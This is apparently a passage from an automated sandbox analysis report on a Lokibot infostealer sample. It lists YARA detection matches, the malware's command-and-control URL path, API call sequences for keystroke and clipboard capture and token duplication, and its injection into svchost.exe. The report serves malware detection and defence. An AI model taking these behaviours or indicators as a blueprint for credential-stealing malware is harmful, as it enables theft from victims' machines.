20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6b 69 6e 67 33 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tking3/five/fre.php was not found on this server.</p></body></html>
                  Source: svchost.exe, svchost.exe, 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00854164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00854164
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00854164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00854164
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00853F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00853F66
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0084001C
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0086CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0086CABC

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: Process Memory Space: TXzf0xX2uq.exe PID: 8516, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 8532, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: This is a third-party compiled AutoIt script.0_2_007E3B3A
                  Source: TXzf0xX2uq.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: TXzf0xX2uq.exe, 00000000.00000002.1302754596.0000000000894000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4b160b9e-c
                  Source: TXzf0xX2uq.exe, 00000000.00000002.1302754596.0000000000894000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b0af2807-a
                  Source: TXzf0xX2uq.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_79365762-f
                  Source: TXzf0xX2uq.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_766ba80f-1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,1_2_00DA3540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,1_2_00DA33C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA2720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,1_2_00DA2720
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0084A1EF
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00838310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00838310
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008451BD
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007EE6A00_2_007EE6A0
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0080D9750_2_0080D975
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008021C50_2_008021C5
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008162D20_2_008162D2
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008603DA0_2_008603DA
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0081242E0_2_0081242E
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008025FA0_2_008025FA
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0083E6160_2_0083E616
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007F66E10_2_007F66E1
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0081878F0_2_0081878F
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008488890_2_00848889
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007F88080_2_007F8808
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008168440_2_00816844
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008608570_2_00860857
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0080CB210_2_0080CB21
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00816DB60_2_00816DB6
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007F6F9E0_2_007F6F9E
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007F30300_2_007F3030
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008031870_2_00803187
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0080F1D90_2_0080F1D9
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E12870_2_007E1287
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008014840_2_00801484
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007F55200_2_007F5520
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008076960_2_00807696
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007F57600_2_007F5760
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008019780_2_00801978
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00819AB50_2_00819AB5
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007EFCE00_2_007EFCE0
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00801D900_2_00801D90
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0080BDA60_2_0080BDA6
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00867DDB0_2_00867DDB
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007EDF000_2_007EDF00
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007F3FE00_2_007F3FE0
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_01275DD80_2_01275DD8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040549C1_2_0040549C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029D41_2_004029D4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA27201_2_00DA2720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00405B6F appears 42 times
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: String function: 007E7DE1 appears 35 times
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: String function: 00808900 appears 42 times
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: String function: 00800AE3 appears 70 times
                  Source: TXzf0xX2uq.exe, 00000000.00000003.1296567031.0000000003E3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TXzf0xX2uq.exe
                  Source: TXzf0xX2uq.exe, 00000000.00000003.1295718684.0000000003C93000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TXzf0xX2uq.exe
                  Source: TXzf0xX2uq.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: Process Memory Space: TXzf0xX2uq.exe PID: 8516, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: svchost.exe PID: 8532, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@1/1
